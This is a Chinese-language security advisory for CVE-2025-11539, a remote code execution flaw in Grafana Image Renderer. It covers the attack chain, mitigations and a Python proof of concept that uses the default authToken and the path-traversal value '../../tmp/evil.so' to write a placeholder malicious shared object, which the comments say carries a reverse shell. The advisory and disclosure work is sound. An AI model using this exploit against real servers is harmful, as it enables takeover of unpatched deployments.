CVE-2025-11539 Grafana Image Renderer 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-11539

漏洞类型

远程代码执行（任意文件写入）

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Grafana Image Renderer

漏洞概述

CVE-2025-11539是Grafana Image Renderer中存在的一个高危远程代码执行漏洞，CVSS评分高达9.9，属于严重级别。该漏洞源于/render/csv端点对filePath参数缺乏充分的验证，导致攻击者可以将恶意的共享对象文件（.so文件）写入到任意目录中。由于Grafana Image Renderer底层使用Chromium进程进行渲染，攻击者写入的恶意共享对象会被Chromium进程加载执行，从而实现远程代码执行。

该漏洞的利用需要满足两个关键条件：第一，目标实例未更改默认的认证令牌（"authToken"），或者攻击者已经获取了该令牌；第二，攻击者能够通过网络访问到Image Renderer的端点。由于Grafana Image Renderer通常作为Grafana的内部服务组件部署，一旦被攻击者利用，可能导致整个服务器被攻陷，进而影响到关联的Grafana主服务。

该漏洞影响从1.0.0版本到4.0.16版本的所有Grafana Image Renderer实例，影响范围广泛。Grafana官方已在4.0.17版本中修复了该漏洞，建议所有受影响的用户尽快升级到最新版本以消除安全风险。该漏洞由Grafana安全团队发现并负责任地披露，体现了开源社区在安全协作方面的良好实践。

技术细节

Grafana Image Renderer是一个用于将Grafana面板渲染为图片的服务，它通过调用Chromium无头浏览器来实现页面截图功能。该漏洞的核心问题在于/render/csv端点的filePath参数处理逻辑存在缺陷。

具体技术原理如下：

1. **端点暴露**：`/render/csv`端点接收CSV文件路径作为参数，用于渲染CSV数据为图片。该端点原本设计用于处理本地或受信任的CSV文件路径。

2. **路径验证缺失**：服务端未对filePath参数进行严格的路径遍历校验和白名单过滤，攻击者可以通过构造特殊路径（如包含`../`的相对路径）将文件写入到任意目录。

3. **共享对象注入**：攻击者利用路径遍历漏洞，将恶意编译的Linux共享对象文件（.so）上传到Chromium进程会加载的目录中。

4. **Chromium加载执行**：当Chromium进程启动或执行某些操作时，会通过LD_PRELOAD或动态链接机制加载指定目录下的共享对象文件，从而触发恶意代码执行。

5. **认证绕过**：由于默认authToken未被修改或被攻击者获取，攻击者可以正常通过身份验证，访问受保护的渲染端点。

整个攻击链结合了路径遍历、任意文件写入和共享对象注入三种技术，最终实现从普通认证用户到远程代码执行的权限提升。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先确认目标部署了Grafana Image Renderer服务，并尝试使用默认的authToken进行身份验证，或通过其他途径获取有效的认证令牌。

STEP 2

步骤2：构造恶意共享对象

攻击者编译一个恶意的Linux共享对象文件（.so），该文件包含构造函数或初始化函数，在被加载时执行反向Shell、添加后门用户或下载恶意载荷等操作。

STEP 3

步骤3：利用路径遍历漏洞

攻击者通过向/render/csv端点发送包含路径遍历字符（如../）的filePath参数，将恶意.so文件上传并写入到Chromium进程会加载的目录中（如/tmp或LD_PRELOAD相关路径）。

STEP 4

步骤4：触发共享对象加载

当Grafana Image Renderer处理新的渲染请求时，Chromium进程启动并通过动态链接机制加载攻击者植入的恶意共享对象，从而执行其中的恶意代码。

STEP 5

步骤5：获取服务器控制权

恶意代码执行后，攻击者获得Image Renderer服务器的控制权限。由于该服务通常以较高权限运行，攻击者可以进一步横向移动，攻击关联的Grafana主服务和其他内部系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11539 - Grafana Image Renderer RCE via Arbitrary File Write
# Exploit: Path traversal in /render/csv filePath parameter to write malicious .so file
# The malicious .so is loaded by Chromium process, resulting in RCE

import requests

TARGET_URL = "https://target-grafana-image-renderer:8081"
AUTH_TOKEN = "authToken"  # default token or known token

# Step 1: Create a malicious shared object that executes a reverse shell
# Compile with: gcc -shared -fPIC -o evil.so evil.c
EVIL_SO_CONTENT = b"\x7fELF..."  # Placeholder for compiled .so binary

# Step 2: Exploit path traversal in filePath parameter to write .so to
# a directory that Chromium will load (e.g., /tmp or LD_PRELOAD path)
malicious_filepath = "../../tmp/evil.so"

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/octet-stream"
}

# Step 3: Send crafted request to /render/csv with traversal path
response = requests.post(
    f"{TARGET_URL}/render/csv",
    headers=headers,
    params={"filePath": malicious_filepath},
    data=EVIL_SO_CONTENT
)

# Step 4: Trigger Chromium to load the malicious .so
# When the renderer service processes a new request, Chromium loads the .so
trigger_response = requests.get(
    f"{TARGET_URL}/render/version",
    headers=headers
)

print(f"Exploit status: {response.status_code}")
print(f"Trigger status: {trigger_response.status_code}")

影响范围

grafana-image-renderer >= 1.0.0

grafana-image-renderer < 4.0.17

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）立即修改默认的authToken为强随机密码，阻止未授权访问；2）在网络层面限制/render/csv端点的访问，仅允许受信任的Grafana主服务IP访问；3）监控文件系统关键目录（如/tmp、/usr/lib等）的.so文件创建事件；4）使用AppArmor或SELinux等强制访问控制机制限制Image Renderer进程的文件写入范围；5）考虑暂时禁用CSV渲染功能，直到完成升级。